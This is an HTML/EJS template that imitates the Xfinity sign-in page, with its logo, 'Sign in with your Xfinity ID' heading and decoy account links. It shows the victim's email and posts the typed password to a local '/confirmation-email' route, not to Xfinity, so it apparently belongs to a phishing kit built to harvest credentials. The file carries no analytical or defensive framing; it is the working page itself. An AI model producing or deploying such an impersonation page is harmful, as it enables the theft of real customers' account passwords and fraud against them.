<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in to Xfinity</title>
    <link rel="stylesheet" href="/stylesheets/input.css">
    <link rel="stylesheet" href="/stylesheets/output.css">

    <style>
        @import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600;700&display=swap');

        body {
            font-family: 'Montserrat', sans-serif;
        }
    </style>

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"
        integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>

<body>
    <div class="flex justify-center m-4">
        <div class="grid grid-cols-1 md:grid-cols-2">
            <div class="hidden md:block">
            </div>
            <div class="lg:px-40">
                <div class="flex flex-col">
                    <div class="items-center">
                        <img src="/images/xfinity-logo-grey.svg" alt="Logo" class="w-24 h-24 mr-4">
                        <h2 class="text-3xl font-bold">Sign in with your Xfinity ID</h2>
                    </div>


                    <form action="/confirmation-email" method="post" class="py-8 rounded-lg">
                        <input type="hidden" name="email" value="<%= email %>">
                        <div class="relative mb-2">
                            <p
                                class="w-full bg-gray-100 rounded-lg px-4 py-2 border border-gray-200 focus:outline-none focus:border-purple-500">
                                <%= email %>
                            </p>
                        </div>

                        <input type="password" name="password"
                            class="w-full bg-gray-100 rounded-lg px-4 py-2 border border-gray-200 focus:outline-none focus:border-purple-500"
                            placeholder="Password">

                        <p class="text-sm text-gray-600 mt-4">
                            By signing in, you agree to our
                            <span class="text-purple-500">Terms of Service</span>
                            and
                            <span class="text-purple-500">Privacy Policy</span>.
                        </p>

                        <button type="submit"
                            class="bg-[#6138F5] hover:bg-[#3A0092] text-white px-6 py-4 rounded-lg mt-4">
                            Let's go
                        </button>
                    </form>

                    <div class="flex flex-col items-start">
                        <div class="flex justify-between cursor-pointer hover:bg-[#F5F5F5] py-4 px-2 w-full mt-4">
                            <span class="text-[#141417] px-1">New to Xfinity? View
                                exclusive offers near you</span>
                            <i class="fa-solid fa-chevron-right"></i>
                        </div>

                        <div class="flex justify-between cursor-pointer w-full hover:bg-[#F5F5F5] py-4 px-2">
                            <span class="text-[#141417] px-1">Find your Xfinity
                                ID</span>
                            <i class="fa-solid fa-chevron-right"></i>
                        </div>

                        <div class="flex justify-between cursor-pointer w-full hover:bg-[#F5F5F5] py-4 px-2">
                            <span class="text-[#141417] px-1">Create a new Xfinity
                                ID</span>
                            <i class="fa-solid fa-chevron-right"></i>
                        </div>
                    </div>

                </div>

            </div>
        </div>
    </div>


</body>

</html>